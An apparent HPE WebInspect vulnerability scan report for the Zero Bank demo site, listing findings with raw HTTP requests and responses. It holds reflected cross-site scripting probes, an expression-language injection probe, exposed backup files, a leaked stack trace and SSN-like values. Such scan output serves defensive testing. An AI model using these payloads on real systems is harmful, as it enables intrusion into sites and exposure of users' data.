Duplicates

HPE Security WebInspect
Duplicates
Web Application Assessment Report
Scan Name:
Policy:
Scan Date:
Scan Version:
Scan Type:
Site: http://zero.webappsecurity.com/
Standard
10/10/2016 1:19:47 PM
16.10.463.10
Site
Crawl Sessions:
Vulnerabilities:
Scan Duration:
Client:
437
104
21 minutes : 27 seconds
FF
Critical Issues
Poor Error Handling: Unhandled Exception
Page:
description
http://zero.webappsecurity.com:80/account/
Request:
GET /account/ HTTP/1.1
Referer: http://zero.webappsecurity.com/resources/js/placeholders.min.js
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="551A58F3CAE8D76CCDEE29CAB920CF53";
PSID="511D6DB521E43A071D015EA7E62869D3"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="ae34b422-6357-4aca-8fe7-7e449e14c9b7"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="10220"; Engine="Directory+Enumeration";
SmartMode="NonServerSpecificOnly"; ThreadId="88"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="51"; smi="0"; sc="1"; ID="0dcb8edc-da07-4d15-8bb4-66a65d53899d";
X-Request-Memo: ID="50ed1642-dcbc-4d5c-8f13-cb22de7c9c32"; sc="1"; ThreadId="107";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 500 Internal Server Error
Date: Mon, 10 Oct 2016 07:51:32 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 15269
...TRUNCATED...user lacks privilege or object not found: INDEX
at org.springframework.jdbc.support.SQLException
SubclassTranslator.doTranslate(SQLExceptionSubclassTranslator.java:95)
at org.springframework.jdbc.support.AbstractFallbackSQLExceptionTranslator.translate
(AbstractFallbackSQLExceptionTranslator.java:72)
Report Date: 10/10/2016
at org.springframework.jdbc.support.AbstractFallbackSQLExceptionTranslator.translate
at org.springframework.jdbc.core.JdbcTemplate.execute(JdbcTemplate.java:407)
at org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:456)
at org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:464)
at org.springframework.jdbc.core.JdbcTemplate.queryForObject(JdbcTemplate.java:472)
at com.hp.webinspect.zero.dao.impl.AccountDaoImpl.get(AccountDaoImpl.java:36)
at com.hp.webinspect.zero.service.impl.AccountServiceImpl.get(AccountServiceImpl.java:38)
at com.hp.webinspect.zero.web.controller.MobileApiController.findAccountById(MobileApiController.java:55)
at sun.reflect.GeneratedMethodAccessor221.invok...TRUNCATED...
Cross-Site Scripting: Reflected

Page:
description
http://zero.webappsecurity.com:80/faq.html?question=1%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%
28%37%34%38%36%37%29%3c%2f%73%43%72%49%70%54%3e
Request:
GET /faq.html?question=1%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%37%34%38%36%37%29%3c%2f%
73%43%72%49%70%54%3e HTTP/1.1
Referer: http://zero.webappsecurity.com/faq.html
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="4FB1346EF67099BEF821A6F9B62A60B6";
PSID="BA7F9A211020B77EBF4F706FEDC87676"; SessionType="AuditAttack"; CrawlType="None";
AttackType="QueryParamManipulation"; OriginatingEngineID="1354e211-9d7d-4cc1-80e6-4de3fd128002"; AttackSequence="2";
AttackParamDesc="question"; AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="5105";
Engine="Cross+Site+Scripting"; SmartMode="NonServerSpecificOnly"; AttackString="1%253c%2573%2543%2572%2549%
2570%2554%253e%2561%256c%2565%2572%2574%2528%2537%2534%2538%2536%2537%2529%253c%252f%2573%
2543%2572%2549%2570%2554%253e"; AttackStringProps="Attack"; ThreadId="104"; ThreadType="AuditorStateRequestor";
X-RequestManager-Memo: sid="45"; smi="0"; sc="1"; ID="4cd3f72c-6ab8-4d08-ad79-ecb66ce35210";
X-Request-Memo: ID="84984235-c28a-4473-8e0a-433b908b1116"; sc="1"; ThreadId="104";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=293AB9C7
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 08:03:43 GMT
Keep-Alive: timeout=5, max=75
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Zero - FAQ - Frequently Asked Questions</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<link type="text/css" rel="stylesheet" href="/resources/css/bootstrap.min.css"/>
<link type="text/css" rel="stylesheet" href="/resources/css/font-awesome.css"/>
<link type="text/css" rel="stylesheet" href="/resources/css/main.css"/>
<script src="/resources/js/jquery-1.8.2.min.js"></script>
<script src="/resources/js/bootstrap.min.js"></script>
<script src="/resources/js/placeholders.min.js"></script>
<script type="text/javascript">
Placeholders.init({
live: true, // Apply to future and modified elements too
hideOnFocus: true // Hide the placeholder when the element receives focus
});
</script>
</script>
$(document).ajaxError(function errorHandler(event, xhr, ajaxOptions, thrownError) {
if (xhr.status == 403) {
window.location.reload();
}
});
</script>
</head>
<body>
<div class="wrapper">
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container">
<a href="/index.html" class="brand">Zero Bank</a>
</div>
</div>
</div>
<div class="top_offset">
<div class="row">
<div class="offset2 span8">
<div class="row">
<div class="page-header">
<h3>Frequently Asked Questions</h3>
</div>
</div>
<div class="row">
<ol class="questions">
<li><a href="/faq.html?question=1">How can I edit my profile?</a></li>
<li><a href="/faq.html?question=2">How can I review my transaction history?</a></li>
</ol>
<hr/>
</div>
<div id="question1" class="row">
<div class="span1">
<div class="number">1</div>
</div>
<div class="span7">
<h4>How can I edit my profile?</h4>
</div>
</div>
<div class="row">
<p>
<ol>
<li>From any page, click your user name which appears at the top right corner of the site.</li>
<li>From the dropdown menu that displays, click My Profile.</li>
<li>Edit your profile.</li>
</ol>
</p>
</div>
</div>
<div id="question2" class="row">
<div class="span1">
<div class="number">2</div>
</div>
<div class="span7">
<h4>How can I review my transaction history?</h4>
</div>
</div>
<div class="row">
<p>
<ol>
<li>Click Account Activity.</li>
<li>Click the Show Transactions tab to view your most recent transactions.</li>
<li>Click the Find Transactions tab to show transactions by a date range.</li>
</ol>
</p>
</p>
</div>
</div>
</div>
</div>
<span id="current_question" class="hide"></span>
function getParameterByName(name) {
var regex = new RegExp("\\?.*?=(.*)$");
var results = r
...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/search.html?searchTerm=12345%3c%73%43%72%3c%53%63%52%69%50%74%
3e%49%70%54%3e%61%6c%65%72%74%28%32%31%37%38%38%29%3c%2f%73%43%72%3c%53%63%52%
69%50%74%3e%49%70%54%3e
Request:
GET /search.html?searchTerm=12345%3c%73%43%72%3c%53%63%52%69%50%74%3e%49%70%54%3e%61%6c%65%
72%74%28%32%31%37%38%38%29%3c%2f%73%43%72%3c%53%63%52%69%50%74%3e%49%70%54%3e HTTP/1.1
Referer: http://zero.webappsecurity.com/
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="1C7CFA469492EFFD5F19DF3B53A3FE01";
PSID="4FB1E28C3A3C661502F583F3EA8F6277"; SessionType="AuditAttack"; CrawlType="None";
AttackType="QueryParamManipulation"; OriginatingEngineID="1354e211-9d7d-4cc1-80e6-4de3fd128002";
AttackSequence="12"; AttackParamDesc="searchTerm"; AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="5105";
Engine="Cross+Site+Scripting"; SmartMode="NonServerSpecificOnly"; AttackString="12345%253c%2573%2543%2572%253c%
2553%2563%2552%2569%2550%2574%253e%2549%2570%2554%253e%2561%256c%2565%2572%2574%2528%2532%
2531%2537%2538%2538%2529%253c%252f%2573%2543%2572%253c%2553%2563%2552%2569%2550%2574%253e%
2549%2570%2554%253e"; AttackStringProps="Attack"; ThreadId="108"; ThreadType="AuditorStateRequestor";
X-RequestManager-Memo: sid="53"; smi="0"; sc="1"; ID="ae8c26a7-0222-4493-aa43-7b5efc44973d";
X-Request-Memo: ID="8ac4544f-949f-45c9-bfd2-5ad0448aa9db"; sc="1"; ThreadId="108";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:55:15 GMT
...TRUNCATED...No results were found for the query: 12345<sCrIpT>alert(21788)</sCrIpT>
</div>
</div>
...TRUNCATED...

Page:
description
http://zero.webappsecurity.com:80/sendFeedback.html
Request:
POST /sendFeedback.html HTTP/1.1
Referer: http://zero.webappsecurity.com/feedback.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 182
Accept: */*
Pragma:
no-cache
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="95C1FE21147002AFF09A188D192C8D0D";
PSID="A8191E30A6A6D05B7ECBC975A580DB55"; SessionType="AuditAttack"; CrawlType="None";
AttackType="PostParamManipulation"; OriginatingEngineID="1354e211-9d7d-4cc1-80e6-4de3fd128002"; AttackSequence="34";
AttackParamDesc="name"; AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="5105";
Engine="Cross+Site+Scripting"; SmartMode="NonServerSpecificOnly"; AttackString="%253c%2561%2520%2548%2572%
2545%2566%253d%254a%2561%2556%2561%2553%2563%2552%2569%2550%2574%253a%2561%256c%2565%2572%
2574%2528%2538%2537%2532%2538%2537%2529%253e"; AttackStringProps="Attack"; ThreadId="107";
ThreadType="AuditorStateRequestor";
X-RequestManager-Memo: sid="51"; smi="0"; sc="1"; ID="077f7850-8a1b-40b5-a5cf-0c3975c7f8f7";
X-Request-Memo: ID="5e7588aa-3fb4-4b6d-aeab-d98f12c94f81"; sc="1"; ThreadId="107";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=3FF9E851
name=%3c%61%20%48%72%45%66%3d%4a%61%56%61%53%63%52%69%50%74%3a%61%6c%65%72%74%28%
38%37%32%38%37%29%3e&email=John.Doe%40somewhere.com&subject=12345&comment=12345&submit=Send%
20Message
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:58:06 GMT
...TRUNCATED.../div>
Thank you for your comments, <a HrEf=JaVaScRiPt:alert(87287)>.
They will be reviewed by our Custom...TRUNCATED...
Privacy Violation: Social Security Number

Page:
description
http://zero.webappsecurity.com:80/admin/users.html
Request:
GET /admin/users.html HTTP/1.1
Referer: http://zero.webappsecurity.com/admin/
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="810BCB46E8C09C737ECDC561083681F4";
PSID="B09C4D5CC22F10C01D9D84418780B93D"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="Relative";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="280";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="7916c964-49d2-4e52-a3d3-5fc08c602847";
X-Request-Memo: ID="3811efb9-c4e3-4c9a-a336-fae774879fd7"; sc="1"; ThreadId="97";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=400B9B5C
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:27 GMT
...TRUNCATED...
<td>
536-48-3769
</td>
...TRUNCATED...
<td>
607-58-7435
</td>
...TRUNCATED...
<td>
247-54-1719
</td>
...TRUNCATED...
<td>
578-13-3713
</td>
...TRUNCATED...
<td>
449-20-3206
</td>
...TRUNCATED...
<td>
008-70-6738
</td>
...TRUNCATED...
<td>
574-56-1932
</td>
...TRUNCATED...
<td>
330-58-4012f1
</td>
...TRUNCATED...
High Issues
Web Server Misconfiguration: Unprotected File
Page:
description
http://zero.webappsecurity.com:80/server-status
Request:
GET /server-status HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="AFEDDE4F98762A991CD0720E24021F4B";
OriginatingEngineID="63a283c6-6b75-41e3-b0c2-d7b0821c2902"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="157"; Engine="Fixed"; SmartMode="ServerSpecificOnly";
ThreadId="93"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="39"; smi="0"; sc="1"; ID="adb6c8a9-3ecc-4eed-9292-e3eb93b4a94c";
X-Request-Memo: ID="dcce354f-9cf5-4f16-8690-e9fd962794d1"; sc="1"; ThreadId="101";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=02B64950
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 08:09:39 GMT
...TRUNCATED...>Apache Status</title>
</head><body>
<h1>Apache Server Status for localhost</h1>
<dl><dt>Server Version: Apache/...TRUNCATED...

Page:
description
http://zero.webappsecurity.com:80/faq.html.bak
Request:
GET /faq.html.bak HTTP/1.1

Referer: http://zero.webappsecurity.com/faq.html
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="429FE5A688ED304522C9927396FB35BB";
PSID="4CAE3BF452C6150F60166D67DC3B7477"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="aabf09b7-996e-479e-9ecc-9f0508d42d72"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="708"; Engine="File+Extension+Addition";
SmartMode="NonServerSpecificOnly"; ThreadId="108"; ThreadType="AuditorStateRequestor";
X-RequestManager-Memo: sid="53"; smi="0"; sc="1"; ID="d57c3e19-75ec-4505-b05a-b945e0413922";
X-Request-Memo: ID="6c8cb142-5bf7-4070-ae79-e98a8688b3f5"; sc="1"; ThreadId="108";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=2313C6AC
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:55:33 GMT
Server: ...TRUNCATED...

Page:
description
http://zero.webappsecurity.com:80/index.html.old
Request:
GET /index.html.old HTTP/1.1
Referer: http://zero.webappsecurity.com/index.html
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="7CA1E733E893A17324796A1F09B96499";
PSID="8E73B3A63EFE2AADE20745A947151EB3"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="aabf09b7-996e-479e-9ecc-9f0508d42d72"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="709"; Engine="File+Extension+Addition";
SmartMode="NonServerSpecificOnly"; ThreadId="102"; ThreadType="AuditorStateRequestor";
X-RequestManager-Memo: sid="41"; smi="0"; sc="1"; ID="9c53cb15-2bae-477f-804f-b08e1874e1b3";
X-Request-Memo: ID="c1a4a9c0-91f0-4e42-8e01-c112a269809f"; sc="1"; ThreadId="102";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:53:48 GMT

Page:
description
http://zero.webappsecurity.com:80/debug.txt
Request:
GET /debug.txt HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="29FFCB3633642C14ECBEB7D48BC76BC9";
PSID="306E42D0F653E7CFA6720D7F15AE506B"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="60b8f839-2e70-4177-8e47-f305852be435"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="1368"; Engine="Site+Search";
SmartMode="NonServerSpecificOnly";
ThreadId="83";
X-RequestManager-Memo:
sid="45"; smi="0";
sc="1"; ThreadType="AuditorStateRequestorPool";
ID="eef16f07-aaef-4645-902f-44780fdf1682";
X-RequestManager-Memo: sid="45"; smi="0"; sc="1"; ID="eef16f07-aaef-4645-902f-44780fdf1682";

X-Request-Memo: ID="053e7ffe-da02-4e05-8ccb-62ad5c0377b4"; sc="1"; ThreadId="104";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:54:25 GMT
Accept-Ranges: bytes
ETag: W/"27144-1368929102000"
Last-Modified: Sun, 19 May 2013 02:05:02 GMT
Content-Type: text/plain;charset=UTF-8
Keep-Alive:...TRUNCATED...

Page:
description
http://zero.webappsecurity.com:80/index.old
Request:
GET /index.old HTTP/1.1
Referer: http://zero.webappsecurity.com/index.html
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="6A2893E020A3F2C8D52B2408615E4102";
PSID="8E73B3A63EFE2AADE20745A947151EB3"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="9d2b8591-9dbe-4085-bc79-15aeab89cc57"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="2083"; Engine="File+Extension+Replacement";
SmartMode="ServerSpecificOnly"; ThreadId="103"; ThreadType="AuditorStateRequestor";
X-RequestManager-Memo: sid="43"; smi="0"; sc="1"; ID="9a50dde0-6715-4c0a-95f2-031c05a03acd";
X-Request-Memo: ID="42a2d660-c2d6-4aa6-9137-dde3b5991302"; sc="1"; ThreadId="103";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=943C3A6B
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 08:09:40 GMT
Insecure Transport
Page:
description
http://zero.webappsecurity.com:80/login.html
Request:
GET /login.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="37A656705626B4D1D64F6BFA191C2A08";
PSID="306E42D0F653E7CFA6720D7F15AE506B"; SessionType="Crawl"; CrawlType="Script"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; Format="Qualified"; LinkKind="HyperLink";
Locations="Unspecified"; Source="ScriptExecution"; ThreadId="281"; ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="43195029-31fc-44c5-af10-bee590481d2f";
X-Request-Memo: ID="8b6aca79-af50-417a-a722-ce1ee8309b42"; sc="1"; ThreadId="99";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:13 GMT
Server: Apache-Coyote/1.1 *
Access-Control-Allow-Origin:
...TRUNCATED... </div>
<form id="login_form" action="/signin.html" method="post" class="form-horizontal">
...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/forgot-password.html
Request:
GET /forgot-password.html HTTP/1.1
Referer: http://zero.webappsecurity.com/login.html
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="35CF74765A8B6CFE70D16739EA0E6BFF";
PSID="37A656705626B4D1D64F6BFA191C2A08"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="1bb49c48-30c0-4105-bc0f-17075fe9b329";
X-Request-Memo: ID="1c38d3f2-e914-4b49-add0-ec54a3a063e3"; sc="2"; ThreadId="98";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:07 GMT
...TRUNCATED...
<form id="send_password_form" action="/forgotten-password-send.html" method="post"
class="form-hor...TRUNCATED...
Web Server Misconfiguration: HTTP Basic Authentication

Page:
description
http://zero.webappsecurity.com:80/manager/html
Request:
GET /manager/html HTTP/1.1
Referer: http://zero.webappsecurity.com:80/manager/
Accept: */*
Pragma: no-cache
X-RequestManager-Memo: Category="StateRequestor.Redirect"; TriggerID="ef3f998d-8124-4e90-b4b3-f9a91d1f6a3b"; sid="53";
smi="0"; sc="1"; ID="7a2b8d86-2551-4b54-8b44-9c6cf1856fd3";
X-Request-Memo: ID="a8959cac-20d1-40af-889e-9553f5e18bee"; sc="1"; ThreadId="108";
Response:
HTTP/1.1
Date:
Mon,401
10 Unauthorized
Oct 2016 07:51:12 GMT
10
Date: Mon, 10 Oct 2016 07:51:12 GMT

Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 UTC
WWW-Authenticate: Basic realm="Tomcat Manager Application"
Content-Type: text/h...TRUNCATED...
Often Misused: Login

Page:
description
http://zero.webappsecurity.com:80/forgot-password.html
Request:
GET /forgot-password.html HTTP/1.1
Referer: http://zero.webappsecurity.com/login.html
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="35CF74765A8B6CFE70D16739EA0E6BFF";
PSID="37A656705626B4D1D64F6BFA191C2A08"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="1bb49c48-30c0-4105-bc0f-17075fe9b329";
X-Request-Memo: ID="1c38d3f2-e914-4b49-add0-ec54a3a063e3"; sc="2"; ThreadId="98";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:07 GMT
...TRUNCATED...
<form id="send_password_form" action="/forgotten-password-send.html" method="post"
class="form-hor...TRUNCATED...
Page:
Request:
Accept: */*
Pragma: no-cache
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:13 GMT
*
Cache-Control:
no-cache, max-age=0,
must-revalidate, no-store
11

...TRUNCATED... </div>
...TRUNCATED...
Cross-Frame Scripting
Page:
description
Request:
Accept: */*
Pragma: no-cache
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:13 GMT
<!DOCTYPE html>
<html lang="en">
<head>
<title>Zero - Log in</title>
Placeholders.init({
});
</script>
if (xhr.status
== 403) {
12
}
});
</script>
</head>
<body>
</div>
</div>
</div>
<div class="row">
<div class="page-header">
<h3>Log in to ZeroBank</h3>
</div>
<div class="form-inputs">
<div class="control-group">
<label class="control-label" for="user_login">Login</label>
<div class="controls">
<input type="text" id="user_login" name="user_login" tabindex="1" autocomplete="off"/>
<i id="credentials" class="icon-question-sign" style="padding-left: 5px"></i>
</div>
</div>
<label class="control-label" for="user_password">Password</label>
<input type="password" id="user_password" name="user_password" tabindex="2" autocomplete="off"/>
</div>
</div>
<label class="control-label" for="user_remember_me">Keep me signed in</label>
<input type="checkbox" id="user_remember_me" name="user_remember_me" tabindex="3"/>
</div>
</div>
</div>
<div class="form-actions">
<input type="submit" name="submit" value="Sign in"
class="btn btn-primary" tabindex="4"/>
</div>
</form>
<a href="/forgot-password.html" tabindex="5">Forgot your password ?</a>
</div>
</div>
$(function () {
$("#user_login").focus();
$("#credentials").tooltip({'trigger':'hover', 'title': 'Login/Password - username/password', placement : 'right'});
$("#login_form").submit(function(event) {
$(this).append('<input type="hidden" name="user_token" value="0fb2e347-fb59-4fb7-b6dc-40a1cc5acf76"/>');
});
});
</script>
</div>
...TRUNCATED...
13
Expression Language Injection

Page:
description
http://zero.webappsecurity.com:80/search.html?searchTerm=${5914%2b2593}
Request:
GET /search.html?searchTerm=${5914%2b2593} HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="80D1BCF5623CAAD9D1B2249893BE5591";
PSID="4FB1E28C3A3C661502F583F3EA8F6277"; SessionType="AuditAttack"; CrawlType="None";
AttackType="QueryParamManipulation"; OriginatingEngineID="d000c3f8-c0fa-4862-8097-613ac7b063fc"; AttackSequence="0";
AttackParamDesc="searchTerm"; AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="11310";
Engine="Expression+Language+Injection"; SmartMode="NonServerSpecificOnly"; AttackString="%24%7b5914%252b2593%7d";
AttackStringProps="Attack"; ThreadId="104"; ThreadType="AuditorStateRequestor";
X-RequestManager-Memo: sid="45"; smi="0"; sc="1"; ID="a721a744-6ef4-40d9-b1ee-1a6d5b22d327";
X-Request-Memo: ID="3aef1eda-bcd3-41d8-8dbc-121ca3149c17"; sc="1"; ThreadId="104";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:50 GMT
...TRUNCATED...s:</h2>
No results were found for the query: 8507
</div>
</div>
<d...TRUNCATED...
Medium Issues
Web Server Misconfiguration: Directory Listing
Page:
description
http://zero.webappsecurity.com:80/errors/
Request:
GET /errors/ HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="BB23AC8A7B9C89C3DE9576C0FEACCA3F";
X-RequestManager-Memo: sid="43"; smi="0"; sc="1"; ID="80f80983-ecf1-439a-863c-27a58b849768";
X-Request-Memo: ID="2d21df20-9bb0-436e-a9b2-bb11433be3dd"; sc="1"; ThreadId="103";
Response:
HTTP/1.1 200 OK
14
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:17 GMT
<html>
<head>
<title>Directory Listing For /errors/</title>
<STYLE></STYLE>
</head>
<body><h1>Directory Listing For /errors/ - <a href="/"><b>Up To /</b></a></h1><HR size="1" noshade="noshade"><table
width="100%" cellspa...TRUNCATED..."5" align="center">
<tr>
<td align="left"><font size="+1"><strong>Filename</strong></font></td>
<td align="center"><font size="+1"><strong>Size</strong></font></td>
<td align="right"><font siz...TRUNCATED...

Page:
description
http://zero.webappsecurity.com:80/admin/WS_FTP.LOG
Request:
GET /admin/WS_FTP.LOG HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="DC2EF0E7C935D7C47528CB0D2E9C1565";
PSID="B09C4D5CC22F10C01D9D84418780B93D"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
X-RequestManager-Memo: sid="43"; smi="0"; sc="1"; ID="c47c8ae6-5758-42e7-82e9-f1558a268886";
X-Request-Memo: ID="807fe938-5c65-4f99-b66a-76c6511855c4"; sc="1"; ThreadId="103";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:38 GMT
ETag: W/"504686-1368929102000"
Content-Type: text/plain
10.1.1.233 10:28
10.1.1.233 10:28
10.1.1.233 08:34
blondbkgB.jpeg
10.1.1.233 08:34
boston.htm
10.1.1.233 08:34
choices.html
10.1.1.233 08:34
concbkg.jpeg
10.1.1.233 08:34
10.1.1.233 08:34
10.1.1.231 13:47
B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn C:\old_repo\root\oad\incoming\lorenzo\boston boston.html

B C:\OADWEB~1\BOSTON\index.htm <-- sunburn C:\old_repo\root\oad\incoming\lorenzo\boston index.html
B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn C:\old_repo\root\oad\incoming\lorenzo\boston
B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn C:\old_repo\root\oad\incoming\lorenzo\boston
B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn C:\old_repo\root\oad\incoming\lorenzo\boston
B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn C:\old_repo\root\oad\incoming\lorenzo\boston
B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn C:\old_repo\root\oad\incoming\lorenzo\boston index.htm
B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn C:\old_repo\root\oad\incoming\lorenzo\boston water5.jpg
B c:\web\boston\ws_ftp.log <-- ...TRUNCATED...
15

Page:
description
http://zero.webappsecurity.com:80/forgotten-password-send.html
Request:
POST /forgotten-password-send.html HTTP/1.1
Referer: http://zero.webappsecurity.com/forgot-password.html
Content-Length: 155
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="3CCA0F0168FF9A4F25516C3DEC652FEB";
PSID="92B4961E57F2D1571E4CFED9894AA305"; SessionType="AuditAttack"; CrawlType="None";
AttackType="PostParamManipulation"; OriginatingEngineID="1354e211-9d7d-4cc1-80e6-4de3fd128002"; AttackSequence="20";
AttackParamDesc="email"; AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="5105"; Engine="Cross+Site+Scripting";
SmartMode="NonServerSpecificOnly"; AttackString="John.Doe%2540somewhere.com%253c%2569%2546%2572%2541%
256d%2545%2520%2573%2552%2563%253d%2578%2553%2572%2546%2574%2545%2573%2554%252e%2573%2550%
2569%253e%253c%252f%2569%2546%2572%2541%256d%2545%253e"; AttackStringProps="Attack"; ThreadId="108";
ThreadType="AuditorStateRequestor";
X-RequestManager-Memo: sid="53"; smi="0"; sc="1"; ID="d20250ee-376e-4a1f-b945-e8cb9e81fb4d";
X-Request-Memo: ID="02d55fa9-b114-421f-93f2-90fd3d61ac52"; sc="1"; ThreadId="108";
email=John.Doe%40somewhere.com%3c%69%46%72%41%6d%45%20%73%52%63%3d%78%53%72%46%74%45%73%
54%2e%73%50%69%3e%3c%2f%69%46%72%41%6d%45%3e&submit=Send%20Password
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 08:04:03 GMT
...TRUNCATED...ent to the following email: John.Doe@somewhere.com<iFrAmE sRc=xSrFtEsT.sPi></iFrAmE>
</div>
</div>
</div>
...TRUNCATED...

Page:
description
http://zero.webappsecurity.com:80/include/common.inc
Request:
GET /include/common.inc HTTP/1.1
Referer: http://zero.webappsecurity.com/include/
Accept: */*
Pragma: no-cache
